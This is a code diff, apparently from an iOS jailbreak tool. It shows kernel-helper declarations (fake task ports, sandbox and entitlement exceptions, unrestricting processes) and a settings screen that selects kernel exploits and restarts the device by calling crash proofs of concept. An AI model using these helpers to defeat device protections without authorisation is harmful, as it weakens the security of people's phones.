kptr_t OSDictionary_ItemValue(kptr_t buffer, uint32_t idx);
|
||||
uint32_t OSArray_ItemCount(kptr_t OSArray);
|
||||
BOOL OSArray_Merge(kptr_t OSArray, kptr_t OSArray2);
|
||||
kptr_t OSArray_GetObject(kptr_t OSArray, uint32_t idx);
|
||||
void OSArray_RemoveObject(kptr_t OSArray, uint32_t idx);
|
||||
kptr_t OSArray_ItemBuffer(kptr_t OSArray);
|
||||
kptr_t OSObjectFunc(kptr_t OSObject, uint32_t off);
|
||||
void OSObject_Release(kptr_t OSObject);
|
||||
void OSObject_Retain(kptr_t OSObject);
|
||||
uint32_t OSObject_GetRetainCount(kptr_t OSObject);
|
||||
uint32_t OSString_GetLength(kptr_t OSString);
|
||||
kptr_t OSString_CStringPtr(kptr_t OSString);
|
||||
char *OSString_CopyString(kptr_t OSString);
|
||||
kptr_t OSUnserializeXML(const char *buffer);
|
||||
kptr_t get_exception_osarray(const char **exceptions);
|
||||
char **copy_amfi_entitlements(kptr_t present);
|
||||
kptr_t getOSBool(BOOL value);
|
||||
BOOL entitle_process(kptr_t amfi_entitlements, const char *key, kptr_t val);
|
||||
BOOL set_sandbox_exceptions(kptr_t sandbox, const char **exceptions);
|
||||
BOOL check_for_exception(char **current_exceptions, const char *exception);
|
||||
BOOL set_amfi_exceptions(kptr_t amfi_entitlements, const char **exceptions);
|
||||
BOOL set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements);
|
||||
kptr_t get_amfi_entitlements(kptr_t cr_label);
|
||||
kptr_t get_sandbox(kptr_t cr_label);
|
||||
BOOL entitle_process_with_pid(pid_t pid, const char *key, kptr_t val);
|
||||
BOOL remove_memory_limit(void);
|
||||
BOOL restore_kernel_task_port(task_t *out_kernel_task_port);
|
||||
BOOL restore_kernel_base(uint64_t *out_kernel_base, uint64_t *out_kernel_slide);
|
||||
BOOL restore_kernel_offset_cache(void);
|
||||
BOOL restore_file_offset_cache(const char *offset_cache_file_path, kptr_t *out_kernel_base, uint64_t *out_kernel_slide);
|
||||
BOOL convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr);
|
||||
kptr_t make_fake_task(kptr_t vm_map);
|
||||
BOOL make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
|
||||
BOOL set_hsp4(task_t port);
|
||||
kptr_t get_vnode_for_path(const char *path);
|
||||
kptr_t get_vnode_for_snapshot(int fd, char *name);
|
||||
BOOL set_kernel_task_info(void);
|
||||
int issue_extension_for_mach_service(kptr_t sb, kptr_t ctx, const char *entry_name, void *desc);
|
||||
BOOL unrestrict_process(pid_t pid);
|
||||
BOOL unrestrict_process_with_task_port(task_t task_port);
|
||||
BOOL revalidate_process(pid_t pid);
|
||||
BOOL revalidate_process_with_task_port(task_t task_port);
|
||||
|
||||
#endif /* kutils_h */
|
||||
|
||||
@@ -10,25 +10,6 @@
|
||||
#import "common.h"
|
||||
#import "utils.h"
|
||||
|
||||
#define K_TWEAK_INJECTION @"TweakInjection"
|
||||
#define K_LOAD_DAEMONS @"LoadDaemons"
|
||||
#define K_DUMP_APTICKET @"DumpAPTicket"
|
||||
#define K_REFRESH_ICON_CACHE @"RefreshIconCache"
|
||||
#define K_BOOT_NONCE @"BootNonce"
|
||||
#define K_EXPLOIT @"Exploit"
|
||||
#define K_DISABLE_AUTO_UPDATES @"DisableAutoUpdates"
|
||||
#define K_DISABLE_APP_REVOKES @"DisableAppRevokes"
|
||||
#define K_OVERWRITE_BOOT_NONCE @"OverwriteBootNonce"
|
||||
#define K_EXPORT_KERNEL_TASK_PORT @"ExportKernelTaskPort"
|
||||
#define K_RESTORE_ROOTFS @"RestoreRootFS"
|
||||
#define K_INCREASE_MEMORY_LIMIT @"IncreaseMemoryLimit"
|
||||
#define K_ECID @"Ecid"
|
||||
#define K_INSTALL_OPENSSH @"InstallOpenSSH"
|
||||
#define K_INSTALL_CYDIA @"InstallCydia"
|
||||
#define K_RELOAD_SYSTEM_DAEMONS @"ReloadSystemDaemons"
|
||||
#define K_HIDE_LOG_WINDOW @"HideLogWindow"
|
||||
#define K_RESET_CYDIA_CACHE @"ResetCydiaCache"
|
||||
|
||||
@interface SettingsTableViewController : UITableViewController <UITextFieldDelegate>
|
||||
@property (weak, nonatomic) IBOutlet UISwitch *TweakInjectionSwitch;
|
||||
@property (weak, nonatomic) IBOutlet UISwitch *LoadDaemonsSwitch;
|
||||
@@ -55,8 +36,11 @@
|
||||
@property (weak, nonatomic) IBOutlet UIButton *RestartSpringBoardButton;
|
||||
@property (weak, nonatomic) IBOutlet UISwitch *HideLogWindowSwitch;
|
||||
@property (weak, nonatomic) IBOutlet UISwitch *ResetCydiaCacheSwitch;
|
||||
@property (weak, nonatomic) IBOutlet UISwitch *SSHOnlySwitch;
|
||||
@property (weak, nonatomic) IBOutlet UISwitch *EnableGetTaskAllowSwitch;
|
||||
@property (weak, nonatomic) IBOutlet UISwitch *SetCSDebuggedSwitch;
|
||||
|
||||
+ (NSDictionary *)_provisioningProfileAtPath:(NSString *)path;
|
||||
+ (NSDictionary *)provisioningProfileAtPath:(NSString *)path;
|
||||
|
||||
@end
|
||||
|
||||
|
||||
@@ -16,6 +16,9 @@
|
||||
#include "utils.h"
|
||||
#include "voucher_swap-poc.h"
|
||||
#include "necp.h"
|
||||
#include "kalloc_crash.h"
|
||||
#include "prefs.h"
|
||||
#include "diagnostics.h"
|
||||
|
||||
@interface SettingsTableViewController ()
|
||||
|
||||
@@ -25,187 +28,28 @@
|
||||
|
||||
// https://github.com/Matchstic/ReProvision/blob/7b595c699335940f68702bb204c5aa55b8b1896f/Shared/Application%20Database/RPVApplication.m#L102
|
||||
|
||||
+ (NSDictionary *)_provisioningProfileAtPath:(NSString *)path {
|
||||
NSError *err;
|
||||
NSString *stringContent = [NSString stringWithContentsOfFile:path encoding:NSASCIIStringEncoding error:&err];
|
||||
+ (NSDictionary *)provisioningProfileAtPath:(NSString *)path {
|
||||
auto stringContent = [NSString stringWithContentsOfFile:path encoding:NSASCIIStringEncoding error:nil];
|
||||
stringContent = [stringContent componentsSeparatedByString:@"<plist version=\"1.0\">"][1];
|
||||
stringContent = [NSString stringWithFormat:@"%@%@", @"<plist version=\"1.0\">", stringContent];
|
||||
stringContent = [stringContent componentsSeparatedByString:@"</plist>"][0];
|
||||
stringContent = [NSString stringWithFormat:@"%@%@", stringContent, @"</plist>"];
|
||||
|
||||
NSData *stringData = [stringContent dataUsingEncoding:NSASCIIStringEncoding];
|
||||
|
||||
NSError *error;
|
||||
NSPropertyListFormat format;
|
||||
|
||||
id plist = [NSPropertyListSerialization propertyListWithData:stringData options:NSPropertyListImmutable format:&format error:&error];
|
||||
|
||||
auto const stringData = [stringContent dataUsingEncoding:NSASCIIStringEncoding];
|
||||
id const plist = [NSPropertyListSerialization propertyListWithData:stringData options:NSPropertyListImmutable format:nil error:nil];
|
||||
return plist;
|
||||
}
|
||||
|
||||
#define STATUS_FILE @"/var/lib/dpkg/status"
|
||||
#define CYDIA_LIST @"/etc/apt/sources.list.d/cydia.list"
|
||||
|
||||
// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1138
|
||||
|
||||
+ (NSArray *)dependencyArrayFromString:(NSString *)depends
|
||||
{
|
||||
NSMutableArray *cleanArray = [[NSMutableArray alloc] init];
|
||||
NSArray *dependsArray = [depends componentsSeparatedByString:@","];
|
||||
for (id depend in dependsArray)
|
||||
{
|
||||
NSArray *spaceDelimitedArray = [depend componentsSeparatedByString:@" "];
|
||||
NSString *isolatedDependency = [[spaceDelimitedArray objectAtIndex:0] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
|
||||
if ([isolatedDependency length] == 0)
|
||||
isolatedDependency = [[spaceDelimitedArray objectAtIndex:1] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
|
||||
|
||||
[cleanArray addObject:isolatedDependency];
|
||||
}
|
||||
|
||||
return cleanArray;
|
||||
}
|
||||
|
||||
// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1163
|
||||
|
||||
+ (NSArray *)parsedPackageArray
|
||||
{
|
||||
NSString *packageString = [NSString stringWithContentsOfFile:STATUS_FILE encoding:NSUTF8StringEncoding error:nil];
|
||||
NSArray *lineArray = [packageString componentsSeparatedByString:@"\n\n"];
|
||||
//NSLog(@"lineArray: %@", lineArray);
|
||||
NSMutableArray *mutableList = [[NSMutableArray alloc] init];
|
||||
//NSMutableDictionary *mutableDict = [[NSMutableDictionary alloc] init];
|
||||
for (id currentItem in lineArray)
|
||||
{
|
||||
NSArray *packageArray = [currentItem componentsSeparatedByString:@"\n"];
|
||||
// NSLog(@"packageArray: %@", packageArray);
|
||||
NSMutableDictionary *currentPackage = [[NSMutableDictionary alloc] init];
|
||||
for (id currentLine in packageArray)
|
||||
{
|
||||
NSArray *itemArray = [currentLine componentsSeparatedByString:@": "];
|
||||
if ([itemArray count] >= 2)
|
||||
{
|
||||
NSString *key = [itemArray objectAtIndex:0];
|
||||
NSString *object = [itemArray objectAtIndex:1];
|
||||
|
||||
if ([key isEqualToString:@"Depends"]) //process the array
|
||||
{
|
||||
NSArray *dependsObject = [SettingsTableViewController dependencyArrayFromString:object];
|
||||
|
||||
[currentPackage setObject:dependsObject forKey:key];
|
||||
|
||||
} else { //every other key, even if it has an array is treated as a string
|
||||
|
||||
[currentPackage setObject:object forKey:key];
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
//NSLog(@"currentPackage: %@\n\n", currentPackage);
|
||||
if ([[currentPackage allKeys] count] > 4)
|
||||
{
|
||||
//[mutableDict setObject:currentPackage forKey:[currentPackage objectForKey:@"Package"]];
|
||||
[mutableList addObject:currentPackage];
|
||||
}
|
||||
|
||||
currentPackage = nil;
|
||||
|
||||
}
|
||||
|
||||
NSSortDescriptor *nameDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Name" ascending:YES
|
||||
selector:@selector(localizedCaseInsensitiveCompare:)];
|
||||
NSSortDescriptor *packageDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Package" ascending:YES
|
||||
selector:@selector(localizedCaseInsensitiveCompare:)];
|
||||
NSArray *descriptors = [NSArray arrayWithObjects:nameDescriptor, packageDescriptor, nil];
|
||||
NSArray *sortedArray = [mutableList sortedArrayUsingDescriptors:descriptors];
|
||||
|
||||
mutableList = nil;
|
||||
|
||||
return sortedArray;
|
||||
}
|
||||
|
||||
// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L854
|
||||
|
||||
+ (NSString *)domainFromRepoObject:(NSString *)repoObject
|
||||
{
|
||||
//LogSelf;
|
||||
if ([repoObject length] == 0)return nil;
|
||||
NSArray *sourceObjectArray = [repoObject componentsSeparatedByString:@" "];
|
||||
NSString *url = [sourceObjectArray objectAtIndex:1];
|
||||
if ([url length] > 7)
|
||||
{
|
||||
NSString *urlClean = [url substringFromIndex:7];
|
||||
NSArray *secondArray = [urlClean componentsSeparatedByString:@"/"];
|
||||
return [secondArray objectAtIndex:0];
|
||||
}
|
||||
return nil;
|
||||
}
|
||||
|
||||
// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L869
|
||||
|
||||
+ (NSArray *)sourcesFromFile:(NSString *)theSourceFile
|
||||
{
|
||||
NSMutableArray *finalArray = [[NSMutableArray alloc] init];
|
||||
NSString *sourceString = [[NSString stringWithContentsOfFile:theSourceFile encoding:NSASCIIStringEncoding error:nil] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
|
||||
NSArray *sourceFullArray = [sourceString componentsSeparatedByString:@"\n"];
|
||||
NSEnumerator *sourceEnum = [sourceFullArray objectEnumerator];
|
||||
id currentSource = nil;
|
||||
while (currentSource = [sourceEnum nextObject])
|
||||
{
|
||||
NSString *theObject = [SettingsTableViewController domainFromRepoObject:currentSource];
|
||||
if (theObject != nil)
|
||||
{
|
||||
if (![finalArray containsObject:theObject])
|
||||
[finalArray addObject:theObject];
|
||||
}
|
||||
}
|
||||
|
||||
return finalArray;
|
||||
}
|
||||
|
||||
+ (NSDictionary *)getDiagnostics {
|
||||
struct utsname u = { 0 };
|
||||
uname(&u);
|
||||
NSDictionary *systemVersion = [NSDictionary dictionaryWithContentsOfFile:@"/System/Library/CoreServices/SystemVersion.plist"];
|
||||
NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];
|
||||
return @{
|
||||
@"Sysname": @(u.sysname),
|
||||
@"Nodename": @(u.nodename),
|
||||
@"Release": @(u.release),
|
||||
@"Version": @(u.version),
|
||||
@"Machine": @(u.machine),
|
||||
@"ProductVersion": systemVersion[@"ProductVersion"],
|
||||
@"ProductBuildVersion": systemVersion[@"ProductBuildVersion"],
|
||||
@"Sources": [SettingsTableViewController sourcesFromFile:CYDIA_LIST],
|
||||
@"Packages": [SettingsTableViewController parsedPackageArray],
|
||||
@"Preferences": @{
|
||||
@"TweakInjection": [defaults objectForKey:K_TWEAK_INJECTION],
|
||||
@"LoadDaemons": [defaults objectForKey:K_LOAD_DAEMONS],
|
||||
@"DumpAPTicket": [defaults objectForKey:K_DUMP_APTICKET],
|
||||
@"RefreshIconCache": [defaults objectForKey:K_REFRESH_ICON_CACHE],
|
||||
@"BootNonce": [defaults objectForKey:K_BOOT_NONCE],
|
||||
@"Exploit": [defaults objectForKey:K_EXPLOIT],
|
||||
@"DisableAutoUpdates": [defaults objectForKey:K_DISABLE_AUTO_UPDATES],
|
||||
@"DisableAppRevokes": [defaults objectForKey:K_DISABLE_APP_REVOKES],
|
||||
@"OverwriteBootNonce": [defaults objectForKey:K_OVERWRITE_BOOT_NONCE],
|
||||
@"ExportKernelTaskPort": [defaults objectForKey:K_EXPORT_KERNEL_TASK_PORT],
|
||||
@"RestoreRootFS": [defaults objectForKey:K_RESTORE_ROOTFS],
|
||||
@"IncreaseMemoryLimit": [defaults objectForKey:K_INCREASE_MEMORY_LIMIT],
|
||||
@"InstallCydia": [defaults objectForKey:K_INSTALL_CYDIA],
|
||||
@"InstallOpenSSH": [defaults objectForKey:K_INSTALL_OPENSSH]
|
||||
},
|
||||
@"AppVersion": appVersion(),
|
||||
@"LogFile": [NSString stringWithContentsOfFile:getLogFile() encoding:NSUTF8StringEncoding error:nil]
|
||||
};
|
||||
- (void)viewWillAppear:(BOOL)animated {
|
||||
[super viewWillAppear:animated];
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (void)viewDidLoad {
|
||||
[super viewDidLoad];
|
||||
UIImageView *myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
|
||||
auto const myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
|
||||
[myImageView setContentMode:UIViewContentModeScaleAspectFill];
|
||||
[myImageView setFrame:self.tableView.frame];
|
||||
UIView *myView = [[UIView alloc] initWithFrame:myImageView.frame];
|
||||
auto const myView = [[UIView alloc] initWithFrame:myImageView.frame];
|
||||
[myView setBackgroundColor:[UIColor whiteColor]];
|
||||
[myView setAlpha:0.84];
|
||||
[myView setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
|
||||
@@ -215,7 +59,6 @@
|
||||
self.tap = [[UITapGestureRecognizer alloc] initWithTarget:self action:@selector(userTappedAnyware:)];
|
||||
self.tap.cancelsTouchesInView = NO;
|
||||
[self.view addGestureRecognizer:self.tap];
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (void)userTappedAnyware:(UITapGestureRecognizer *) sender
|
||||
@@ -229,62 +72,78 @@
|
||||
}
|
||||
|
||||
- (void)reloadData {
|
||||
[self.TweakInjectionSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_TWEAK_INJECTION]];
|
||||
[self.LoadDaemonsSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_LOAD_DAEMONS]];
|
||||
[self.DumpAPTicketSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_DUMP_APTICKET]];
|
||||
[self.BootNonceTextField setPlaceholder:[[NSUserDefaults standardUserDefaults] objectForKey:K_BOOT_NONCE]];
|
||||
auto prefs = copy_prefs();
|
||||
[self.TweakInjectionSwitch setOn:(BOOL)prefs->load_tweaks];
|
||||
[self.LoadDaemonsSwitch setOn:(BOOL)prefs->load_daemons];
|
||||
[self.DumpAPTicketSwitch setOn:(BOOL)prefs->dump_apticket];
|
||||
[self.BootNonceTextField setPlaceholder:@(prefs->boot_nonce)];
|
||||
[self.BootNonceTextField setText:nil];
|
||||
[self.RefreshIconCacheSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_REFRESH_ICON_CACHE]];
|
||||
[self.KernelExploitSegmentedControl setSelectedSegmentIndex:[[NSUserDefaults standardUserDefaults] integerForKey:K_EXPLOIT]];
|
||||
[self.DisableAutoUpdatesSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_DISABLE_AUTO_UPDATES]];
|
||||
[self.DisableAppRevokesSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_DISABLE_APP_REVOKES]];
|
||||
[self.RefreshIconCacheSwitch setOn:(BOOL)prefs->run_uicache];
|
||||
[self.KernelExploitSegmentedControl setSelectedSegmentIndex:(int)prefs->exploit];
|
||||
[self.DisableAutoUpdatesSwitch setOn:(BOOL)prefs->disable_auto_updates];
|
||||
[self.DisableAppRevokesSwitch setOn:(BOOL)prefs->disable_app_revokes];
|
||||
[self.KernelExploitSegmentedControl setEnabled:supportsExploit(empty_list_exploit) forSegmentAtIndex:empty_list_exploit];
|
||||
[self.KernelExploitSegmentedControl setEnabled:supportsExploit(multi_path_exploit) forSegmentAtIndex:multi_path_exploit];
|
||||
[self.KernelExploitSegmentedControl setEnabled:supportsExploit(async_wake_exploit) forSegmentAtIndex:async_wake_exploit];
|
||||
[self.KernelExploitSegmentedControl setEnabled:supportsExploit(voucher_swap_exploit) forSegmentAtIndex:voucher_swap_exploit];
|
||||
[self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_exploit) forSegmentAtIndex:mach_swap_exploit];
|
||||
[self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_2_exploit) forSegmentAtIndex:mach_swap_2_exploit];
|
||||
[self.OpenCydiaButton setEnabled:[[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"cydia://"]]];
|
||||
[self.ExpiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController _provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, NSLocalizedString(@"Days", nil)]];
|
||||
[self.OverwriteBootNonceSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_OVERWRITE_BOOT_NONCE]];
|
||||
[self.ExportKernelTaskPortSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_EXPORT_KERNEL_TASK_PORT]];
|
||||
[self.RestoreRootFSSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_RESTORE_ROOTFS]];
|
||||
[self.UptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)uptime() / 86400, NSLocalizedString(@"Days", nil)]];
|
||||
[self.IncreaseMemoryLimitSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_INCREASE_MEMORY_LIMIT]];
|
||||
[self.installSSHSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_INSTALL_OPENSSH]];
|
||||
[self.installCydiaSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_INSTALL_CYDIA]];
|
||||
[self.ECIDLabel setPlaceholder:hexFromInt([[[NSUserDefaults standardUserDefaults] objectForKey:K_ECID] integerValue])];
|
||||
[self.ReloadSystemDaemonsSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_RELOAD_SYSTEM_DAEMONS]];
|
||||
[self.HideLogWindowSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_HIDE_LOG_WINDOW]];
|
||||
[self.ResetCydiaCacheSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_RESET_CYDIA_CACHE]];
|
||||
[self.ExpiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, localize(@"Days")]];
|
||||
[self.OverwriteBootNonceSwitch setOn:(BOOL)prefs->overwrite_boot_nonce];
|
||||
[self.ExportKernelTaskPortSwitch setOn:(BOOL)prefs->export_kernel_task_port];
|
||||
[self.RestoreRootFSSwitch setOn:(BOOL)prefs->restore_rootfs];
|
||||
[self.UptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)getUptime() / 86400, localize(@"Days")]];
|
||||
[self.IncreaseMemoryLimitSwitch setOn:(BOOL)prefs->increase_memory_limit];
|
||||
[self.installSSHSwitch setOn:(BOOL)prefs->install_openssh];
|
||||
[self.installCydiaSwitch setOn:(BOOL)prefs->install_cydia];
|
||||
[self.ECIDLabel setPlaceholder:hexFromInt([@(prefs->ecid) integerValue])];
|
||||
[self.ReloadSystemDaemonsSwitch setOn:(BOOL)prefs->reload_system_daemons];
|
||||
[self.HideLogWindowSwitch setOn:(BOOL)prefs->hide_log_window];
|
||||
[self.ResetCydiaCacheSwitch setOn:(BOOL)prefs->reset_cydia_cache];
|
||||
[self.SSHOnlySwitch setOn:(BOOL)prefs->ssh_only];
|
||||
[self.EnableGetTaskAllowSwitch setOn:(BOOL)prefs->enable_get_task_allow];
|
||||
[self.SetCSDebuggedSwitch setOn:(BOOL)prefs->set_cs_debugged];
|
||||
[self.RestartSpringBoardButton setEnabled:respringSupported()];
|
||||
[self.restartButton setEnabled:restartSupported()];
|
||||
release_prefs(&prefs);
|
||||
[self.tableView reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)TweakInjectionSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.TweakInjectionSwitch isOn] forKey:K_TWEAK_INJECTION];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->load_tweaks = (bool)self.TweakInjectionSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)LoadDaemonsSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.LoadDaemonsSwitch isOn] forKey:K_LOAD_DAEMONS];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->load_daemons = (bool)self.LoadDaemonsSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)DumpAPTicketSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.DumpAPTicketSwitch isOn] forKey:K_DUMP_APTICKET];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->dump_apticket = (bool)self.DumpAPTicketSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)BootNonceTextFieldTriggered:(id)sender {
|
||||
uint64_t val = 0;
|
||||
auto val = (uint64_t)0;
|
||||
if ([[NSScanner scannerWithString:[self.BootNonceTextField text]] scanHexLongLong:&val] && val != HUGE_VAL && val != -HUGE_VAL) {
|
||||
[[NSUserDefaults standardUserDefaults] setObject:[NSString stringWithFormat:@ADDR, val] forKey:K_BOOT_NONCE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->boot_nonce = [NSString stringWithFormat:@ADDR, val].UTF8String;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
} else {
|
||||
UIAlertController *alertController = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Invalid Entry", nil) message:NSLocalizedString(@"The boot nonce entered could not be parsed", nil) preferredStyle:UIAlertControllerStyleAlert];
|
||||
UIAlertAction *OK = [UIAlertAction actionWithTitle:NSLocalizedString(@"OK", nil) style:UIAlertActionStyleDefault handler:nil];
|
||||
auto const alertController = [UIAlertController alertControllerWithTitle:localize(@"Invalid Entry") message:localize(@"The boot nonce entered could not be parsed") preferredStyle:UIAlertControllerStyleAlert];
|
||||
auto const OK = [UIAlertAction actionWithTitle:localize(@"OK") style:UIAlertActionStyleDefault handler:nil];
|
||||
[alertController addAction:OK];
|
||||
[self presentViewController:alertController animated:YES completion:nil];
|
||||
}
|
||||
@@ -292,27 +151,33 @@
|
||||
}
|
||||
|
||||
- (IBAction)RefreshIconCacheSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.RefreshIconCacheSwitch isOn] forKey:K_REFRESH_ICON_CACHE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->run_uicache = (bool)self.RefreshIconCacheSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)KernelExploitSegmentedControl:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setInteger:self.KernelExploitSegmentedControl.selectedSegmentIndex forKey:K_EXPLOIT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->exploit = (int)self.KernelExploitSegmentedControl.selectedSegmentIndex;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)DisableAppRevokesSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.DisableAppRevokesSwitch isOn] forKey:K_DISABLE_APP_REVOKES];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->disable_app_revokes = (bool)self.DisableAppRevokesSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)tappedOnRestart:(id)sender {
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
|
||||
NOTICE(NSLocalizedString(@"The device will be restarted.", nil), true, false);
|
||||
NSInteger support = recommendedRestartSupport();
|
||||
_assert(support != -1, message, true);
|
||||
auto const block = ^(void) {
|
||||
notice(localize(@"The device will be restarted."), true, false);
|
||||
auto const support = recommendedRestartSupport();
|
||||
switch (support) {
|
||||
case necp_exploit: {
|
||||
necp_die();
|
||||
@@ -322,23 +187,30 @@
|
||||
voucher_swap_poc();
|
||||
break;
|
||||
}
|
||||
case kalloc_crash: {
|
||||
do_kalloc_crash();
|
||||
break;
|
||||
}
|
||||
default:
|
||||
break;
|
||||
}
|
||||
exit(EXIT_FAILURE);
|
||||
});
|
||||
};
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
|
||||
}
|
||||
|
||||
- (IBAction)DisableAutoUpdatesSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.DisableAutoUpdatesSwitch isOn] forKey:K_DISABLE_AUTO_UPDATES];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->disable_auto_updates = (bool)self.DisableAutoUpdatesSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)tappedOnShareDiagnosticsData:(id)sender {
|
||||
NSURL *URL = [NSURL fileURLWithPath:[NSString stringWithFormat:@"%@/Documents/diagnostics.plist", NSHomeDirectory()]];
|
||||
[[SettingsTableViewController getDiagnostics] writeToURL:URL error:nil];
|
||||
UIActivityViewController *activityViewController = [[UIActivityViewController alloc] initWithActivityItems:@[URL] applicationActivities:nil];
|
||||
auto const URL = [NSURL fileURLWithPath:[NSString stringWithFormat:@"%@/Documents/diagnostics.plist", NSHomeDirectory()]];
|
||||
[getDiagnostics() writeToURL:URL error:nil];
|
||||
auto const activityViewController = [[UIActivityViewController alloc] initWithActivityItems:@[URL] applicationActivities:nil];
|
||||
if ([activityViewController respondsToSelector:@selector(popoverPresentationController)]) {
|
||||
[[activityViewController popoverPresentationController] setSourceView:self.ShareDiagnosticsDataButton];
|
||||
}
|
||||
@@ -354,66 +226,82 @@
|
||||
}
|
||||
|
||||
- (IBAction)OverwriteBootNonceSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.OverwriteBootNonceSwitch isOn] forKey:K_OVERWRITE_BOOT_NONCE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->overwrite_boot_nonce = (bool)self.OverwriteBootNonceSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
